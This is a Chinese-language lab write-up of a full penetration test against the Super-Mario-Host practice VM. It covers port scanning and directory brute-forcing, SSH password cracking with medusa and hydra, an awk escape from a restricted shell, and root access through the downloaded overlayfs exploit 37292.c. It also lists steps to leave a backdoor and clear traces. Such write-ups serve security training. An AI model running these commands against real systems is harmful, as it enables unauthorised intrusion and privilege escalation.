靶机渗透(八)Super-Mario-Host
靶机Super-Mario-Host
一、实验环境
二、实验步骤
(一)信息收集
1.查看测试机的IP信息,判断所处网段
2.主机发现(netdiscover)
3.端口扫描(masscan/nmap)
4.网站指纹信息扫描(whatweb)
(二)Web渗透
1.浏览web网页(8180端口)
2.目录扫描(dirb)
3.访问/vhosts
4.目录爆破(御剑)
5.访问/luigi.php
6.访问/mario.php
7.访问/command.php
8.生成字典(john)
9.暴力破解(medusa)
>暴力破解(hydra)
10.远程连接
11.权限突破(awk)
12.提权
13.留后门
14.清痕迹
一、实验环境
1.靶机:Super-Mario-Host
2.测试机:Kali
3.帮凶机:Windows 10
4.抓包工具:BurpSuite
二、实验步骤
(一)信息收集
1.查看测试机的IP信息,判断所处网段
2.主机发现(netdiscover)
netdiscover -i eth0 -r 192.168.10.0/24
3.端口扫描(masscan/nmap)
masscan --rate=10000 --ports 0-65535 192.168.10.154
nmap -sV -T4 -p 111,80,52448,22 192.168.10.151
-
开启了22(ssh服务)、8180(http服务)端口
4.网站指纹信息扫描(whatweb)
whatweb 192.168.10.154:8180
(二)Web渗透
1.浏览web网页(8180端口)
http://192.168.10.154:8180
-
网页与其源代码均无有用信息(这是个假网站!!!让我们去寻找真网站把!!!)
2.目录扫描(dirb)
dirb http://192.168.10.154:8180 /usr/share/dirb/wordlists/big.txt #字典这种东西,有的能扫到,有的扫不到,换个就好了
-
将扫描出的路径逐个尝试,只有/vhosts返回值是200的目录(不管怎么扫都只有两个路径,我也很无奈啊?!)
3.访问/vhosts
a.尝试访问/vhosts
http://192.168.10.154:8180/vhosts
-
第一部分注释表明:收到请求后,虚拟主机首先检查hosts http请求标头中提交的值,然后使用它来选择要服务的目标来工作
-
获得一些敏感的节点信息:
靶机服务器名称(mario.supermariohost.local)
服务器的管理员(webmaster@localhost)
网站根路径(/var/www/supermariohost)
目录索引(mario.php)
-
若访问http://mario.supermariohost.local:8180,服务器将从/var/www/supermariohost目录中提供文件来服务mario.php
b.尝试访问服务器
http://mario.supermariohost.local:8180
-
访问失败,系统不识别服务器,应修改hosts文件
c.修改测试机的hosts文件
192.168.10.154 mario.supermariohost.local
-
Windows中hosts文件:C:\Windows\System32\drivers\etc\hosts
-
Linux中hosts文件:/etc/hosts
-
Hosts文件作用:将一些常用的网址域名与其对应的IP地址建立一个关联“数据库”,当用户在浏览器中输入一个需要登录的网址时,系统会首先自动从hosts文件中去寻找对应的IP地址,一旦找到,系统会立即打开对应网页,如果没有找到,系统则会再将网址提交DNS域名解析服务器进行IP地址解析
d.再次访问服务器(成功)
http://mario.supermariohost.local:8180
4.目录爆破(御剑)
http://mario.supermariohost.local:8180
5.访问/luigi.php
http://mario.supermariohost.local:8180/luigi.php
-
发现luigi的一封信,其内容可用于创造字典(Luigi、luigi、Luiiiggiii、luiiiggiii)list.txt
6.访问/mario.php
-
与网页首页相同,发现一段话,可用于创造字典(Mario、mario、Maaaaario)list.txt
7.访问/command.php
-
此页面可以对用户名进行搜索,看是否存在,对字典list.txt文件中的用户名挨个进行验证,仅有luigi用户名存在,使用john命令生成luigipass.txt字典
-
此时发现一个bug,查询用户名时抓包,发现这里所查询的用户名存在并不准确
8.生成字典(john)
john --wordlist=list.txt --stdout --rules > pass.txt
-
John命令,可让字典在已有的字典上外加规则,修改基础词汇,扩充得到更丰富的字典(棒的哟~!)
9.暴力破解(medusa)
medusa -M ssh -t 4 -h 192.168.10.154 -U list.txt -P pass.txt #美杜莎真的是难用到爆炸!!!
-
得到账号密码:luigi(luigi1)
>暴力破解(hydra)
hydra -l luigi -P luigipass.txt 192.168.10.154 ssh -t 20
此处luigipass.txt字典为只有用户名luigi使用John命令建立的扩充字典
10.远程连接
ssh [email protected]
-
终极三问命令无法使用,查看了一个message文件
-
用户luigi被困在一个有限的shell中,仅可使用awk,cat,cd,clear,echo,exit,help,history,ll,lpath,ls,lsudo,vim
11.权限突破(awk)
awk 'BEGIN {system("/bin/bash")}'
12.提权
a.扫描服务器版本(searchsploit)
searchsploit linux 3.13
-
该服务器版本存在本地权限提升漏洞('overlayfs' Local Privilege Escalation),下载相关提权文件,进行提权
b.获取提权文件
cp /usr/share/exploitdb/platforms/linux/local/37292.c /var/www/html /etc/init.d/apache2 start
wget http://192.168.10.128/37292.c
c.执行提权文件,提权
gcc 37292.c -o exp
./exp 123
13.留后门
echo '' > index.php
14.清痕迹
总结:
1.开启http服务端口为8180端口,访问服务器时需加上端口号(默认为80端口)
2.可使用多种目录爆破工具进行爆破,以找到有用路径
3.对页面信息进行收集,学会筛选有用信息,做成字典以备用
4.用户账号若是被困在一个有限的shell中,使用awk命令是个好办法
5.对靶机服务器版本进行扫描,有可能获取版本漏洞,从而加以利用